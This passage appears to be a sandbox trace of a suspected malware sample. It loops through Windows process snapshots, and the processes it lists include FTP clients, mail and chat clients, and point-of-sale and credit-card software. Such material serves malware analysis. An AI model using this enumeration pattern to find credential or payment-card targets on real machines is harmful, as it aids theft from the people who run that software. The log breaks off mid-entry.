Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0252.084] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0252.085] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0252.087] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.091] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0252.094] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0252.096] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0252.098] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0252.100] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0252.101] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0252.103] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0252.233] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0252.234] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0252.236] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0252.237] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0252.239] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0252.240] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0252.241] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0252.243] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0252.244] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0252.249] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0252.250] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0252.251] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0252.253] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0252.254] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0252.255] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0252.257] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0252.258] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0252.260] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0252.261] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0252.264] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0252.266] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0252.267] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0252.269] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0252.270] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0252.272] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0252.274] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0252.275] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0252.349] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0252.356] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0252.359] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0252.361] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0252.363] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0252.366] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0252.368] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0252.370] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0252.374] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0252.376] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0252.378] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0252.380] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0252.383] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0252.385] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0252.469] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0252.471] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0252.473] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0252.476] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0252.478] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0252.499] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0252.502] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0252.505] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0252.507] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0252.509] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0252.517] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0252.519] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0252.521] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0252.523] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0252.526] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0252.580] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0252.583] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0252.585] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0252.586] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0252.588] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0252.592] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0252.593] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0252.595] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0252.596] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0252.598] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0252.599] CloseHandle (hObject=0x1018) returned 1 [0252.599] Sleep (dwMilliseconds=0x64) [0252.738] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0252.754] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.755] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0252.757] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0252.758] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0252.760] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0252.764] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0252.765] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, 